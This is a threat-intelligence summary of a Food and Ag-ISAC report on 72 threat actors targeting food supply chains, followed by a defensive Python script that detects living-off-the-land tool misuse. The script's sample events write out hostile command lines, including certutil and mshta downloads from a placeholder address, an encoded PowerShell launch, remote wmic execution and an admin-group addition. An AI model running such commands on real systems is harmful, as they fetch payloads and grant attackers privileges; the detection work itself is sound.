Full Report
The Food and Ag-ISAC paints a stark picture of a sector facing sustained and increasingly sophisticated cyber pressure,...
Source: "Food and Ag-ISAC finds 72 active threat actors behind persistent, sophisticated cyber attacks targeting food supply chains", Industrial Cyber.
Analysis Summary
Based on the article provided, here is the structured summary of the threat landscape affecting the Food and Agriculture sector.
*Note: As the article identifies a cluster of 72 actors rather than focusing on a single entity, the summary below highlights the top-ranked adversaries identified by the Food and Ag-ISAC.*
# Threat Actor: Food & Ag Sector Top Adversaries (Group Summary)
## Attribution & Identity
The Food and Ag-ISAC identified 72 active threat actors among the 330 adversaries it monitors. By origin, observed activity breaks down as:
* **Russia:** 59.3% of observed activity (Nation-state and Ransomware ecosystems).
* **China:** 25.4% of observed activity (Nation-state operations).
* **Top 10 Ranked Actors (by Predictive Adversary Scoring System, PASS, score):** The percentages above are shares of observed activity by origin, while PASS scores individual actors; the two measures need not agree, which is why North Korean groups head the ranking without appearing in the share breakdown.
1. **Lazarus Group** (North Korea, Nation-state) - Score: 84
2. **Moonstone Sleet** (North Korea, Nation-state) - Score: 84
3. **APT41** (China, Nation-state) - Score: 79
4. **Scattered Spider** (Financial/Cybercriminal) - Score: 77
5. **Qilin** (Ransomware) - Score: 76
6. **LockBit 5.0** (Ransomware) - Score: 76
7. **Lapsus$ Hunters** (Cybercriminal) - Score: 76
8. **Dark Engine** (Hacktivist) - Score: 76
9. **APT18** (China, Nation-state) - Score: 75
10. **Akira** (Ransomware) - Score: 73
## Activity Summary
"The 2025 Food and Agriculture Cyber Threat Report" describes sustained pressure on the sector, with persistent targeting of the "farm-to-table" supply chain through late 2024 and early 2025. Operations combine two threats: state-backed espionage and financially motivated ransomware.
## Tactics, Techniques & Procedures
* **Living-off-the-Land (LotL):** Abusing legitimate, signed administrative tools already present on hosts, so that activity blends into normal operations and signature-based controls have nothing to match.
* **Modified Malware:** Deploying customized variants of malicious code so that existing detections no longer fire.
* **Supply Chain Compromise:** Compromising third-party vendors and their access paths to reach the primary targets.
* **Data Extortion:** Stealing sensitive data and threatening its release to pressure victims into paying, with or without encryption.
* **Persistent Access:** Strong emphasis on maintaining a long-term foothold inside industrial networks.
## Targeting
* **Sectors:** Food and Agriculture supply chain (production, processing, and distribution).
* **Geography:** Global, with activity aligned to Russian and Chinese geopolitical interests; the article's related coverage also references the Nordics and US infrastructure.
* **Victims:** "Farm-to-table" food and agriculture entities in general. The article's related-news items also mention the medical technology firm Stryker (suspected Iran-linked intrusion) and New York water infrastructure; neither is a food-sector victim.
## Tools & Infrastructure
* **Malware Families:**
  * LockBit 5.0
  * Qilin
  * Akira
* **Infrastructure:**
  * Vulnerable VMware Horizon servers (an initial-access vector previously exploited by Lazarus).
  * Remote access tools used for persistence.
  * Infrastructure associated with ransomware ecosystems.
## Implications
The strategic intent behind these attacks mixes financial gain with geopolitical leverage. The dominance of Russia- and China-attributed activity suggests food security is being treated as a lever for state-level pressure. Because the supply chain is tightly coupled, a single successful intrusion at a producer, processor, or distributor can cascade into food availability and economic stability.
## Mitigations
* **Prioritize Resource Allocation:** Use the Predictive Adversary Scoring System (PASS) to focus on the highest-scoring threats (e.g., Lazarus, Moonstone Sleet).
* **Supply Chain Security:** Vet third-party vendors, inventory and restrict the remote access paths they use, and monitor those sessions rather than trusting them by default.
* **Living-off-the-Land Defense:** Collect process-creation, command-line, and parent-process telemetry and run behavioral detections for misuse of legitimate administrative tools; signatures alone will not catch tools that are supposed to be there.
* **Information Sharing:** Engage with the Food and Ag-ISAC to access actionable threat intelligence and PASS metrics.
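As an added example that is not from the ISAC report or the Industrial Cyber article, the Python script below shows what the behavioral LotL monitoring recommended above looks like in practice: a small set of rules run over process-creation events (fields modelled on Sysmon Event ID 1) that flag certutil download or decode use, encoded or download-cradle PowerShell, script hosts spawned by Office or browser processes, wmic remote process creation, and net.exe account or group additions. The events, hostnames, usernames, the 203.0.113.10 address, and the tool and parent lists are all constructed or assumed for the demonstration and would be tuned to a real estate.

```python
"""LotL misuse detection over process-creation events. Added example, not from the
Food and Ag-ISAC report or Industrial Cyber; fields mimic Sysmon Event ID 1, and all
events, hosts, the 203.0.113.10 address and rule lists are constructed or assumed."""
from dataclasses import dataclass
from typing import Callable

@dataclass(frozen=True)
class ProcessEvent:
    host: str
    user: str
    parent_image: str
    image: str
    command_line: str

def basename(path: str) -> str:
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()

# Assumed lists: apps that should not spawn shells, and the script hosts they might spawn.
USER_APPS = {"winword.exe", "excel.exe", "outlook.exe", "chrome.exe", "msedge.exe"}
SCRIPT_HOSTS = {"mshta.exe", "rundll32.exe", "regsvr32.exe", "wscript.exe",
                "cscript.exe", "powershell.exe", "pwsh.exe", "cmd.exe"}

def certutil_download_or_decode(ev: ProcessEvent) -> bool:
    """certutil fetching a URL or (de)coding a file is a classic LotL download."""
    if basename(ev.image) != "certutil.exe":
        return False
    flags = {t.lstrip("-/") for t in ev.command_line.lower().split() if t[0] in "-/"}
    return bool(flags & {"urlcache", "decode", "encode"})

def powershell_encoded_or_cradle(ev: ProcessEvent) -> bool:
    """Encoded commands and in-memory download cradles hide the real script."""
    if basename(ev.image) not in {"powershell.exe", "pwsh.exe"}:
        return False
    low = ev.command_line.lower()
    # PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...).
    encoded = any(len(t) >= 2 and "-encodedcommand".startswith(t) for t in low.split())
    cradle = any(s in low for s in ("downloadstring(", "invoke-expression", "iex "))
    return encoded or cradle

def script_host_from_user_app(ev: ProcessEvent) -> bool:
    """Office/browser spawning a shell or script host: maldoc or drive-by pattern."""
    return basename(ev.image) in SCRIPT_HOSTS and basename(ev.parent_image) in USER_APPS

def wmic_process_create(ev: ProcessEvent) -> bool:
    """'wmic process call create' is a common (remote) execution primitive."""
    return (basename(ev.image) == "wmic.exe"
            and {"process", "call", "create"} <= set(ev.command_line.lower().split()))

def net_account_or_group_add(ev: ProcessEvent) -> bool:
    """Adding users or group members with net.exe is a cheap persistence step."""
    toks = ev.command_line.lower().split()
    return (basename(ev.image) in {"net.exe", "net1.exe"} and "/add" in toks
            and ("user" in toks or "localgroup" in toks))

RULES: list[tuple[str, Callable[[ProcessEvent], bool]]] = [
    ("certutil download/decode", certutil_download_or_decode),
    ("powershell encoded/cradle", powershell_encoded_or_cradle),
    ("script host from Office/browser", script_host_from_user_app),
    ("wmic process call create", wmic_process_create),
    ("net user/localgroup /add", net_account_or_group_add),
]

def detect(events: list[ProcessEvent]) -> list[tuple[str, str, str]]:
    """(host, rule name, command line) for every rule each event triggers."""
    return [(ev.host, name, ev.command_line)
            for ev in events for name, rule in RULES if rule(ev)]

def by_host(hits: list[tuple[str, str, str]]) -> dict[str, list[str]]:
    """Triggered rule names per host, for triage."""
    grouped: dict[str, list[str]] = {}
    for host, rule, _ in hits:
        grouped.setdefault(host, []).append(rule)
    return grouped

# Constructed sample telemetry (S32/OFFICE only shorten the paths).
S32 = r"C:\Windows\System32"
OFFICE = r"C:\Program Files\Microsoft Office\root\Office16"
SAMPLE_EVENTS = [
    ProcessEvent("plc-hmi-01", "opsadmin", S32 + r"\cmd.exe", S32 + r"\certutil.exe",
                 "certutil -hashfile vendor_update.msi SHA256"),  # benign integrity check
    ProcessEvent("plc-hmi-01", "opsadmin", S32 + r"\cmd.exe", S32 + r"\certutil.exe",
                 r"certutil -urlcache -split -f http://203.0.113.10/u.dat C:\Users\Public\u.dat"),
    ProcessEvent("erp-app-02", "svc_backup", S32 + r"\svchost.exe", S32 + r"\WindowsPowerShell\v1.0\powershell.exe",
                 r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\nightly_backup.ps1"),  # benign
    ProcessEvent("erp-app-02", "jdoe", OFFICE + r"\WINWORD.EXE", S32 + r"\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"),
    ProcessEvent("erp-app-02", "jdoe", S32 + r"\cmd.exe", S32 + r"\wbem\wmic.exe",
                 r'wmic /node:cold-store-03 process call create "cmd.exe /c whoami > C:\t.txt"'),
    ProcessEvent("cold-store-03", "line_op", r"C:\Windows\explorer.exe", S32 + r"\net.exe",
                 r"net use Z: \\fileserver\recipes"),  # benign drive mapping
    ProcessEvent("cold-store-03", "jdoe", S32 + r"\cmd.exe", S32 + r"\net.exe",
                 "net localgroup Administrators backup_svc /add"),
    ProcessEvent("office-ws-17", "msmith", OFFICE + r"\OUTLOOK.EXE", S32 + r"\mshta.exe",
                 "mshta.exe http://203.0.113.10/invoice.hta"),
]

if __name__ == "__main__":
    print(by_host(detect(SAMPLE_EVENTS)))
```

Run stand-alone, the script reports one hit on plc-hmi-01 (the certutil download), three on erp-app-02 (the encoded PowerShell matches both the encoding rule and the Office-parent rule, plus the wmic call), one on cold-store-03, and one on office-ws-17, while the benign certutil hash check, the scheduled backup script, and the drive mapping produce nothing. The design point is that every rule keys on behaviour (flag, argument, or parent) rather than on the binary, because the binaries are legitimate and will be present on every host.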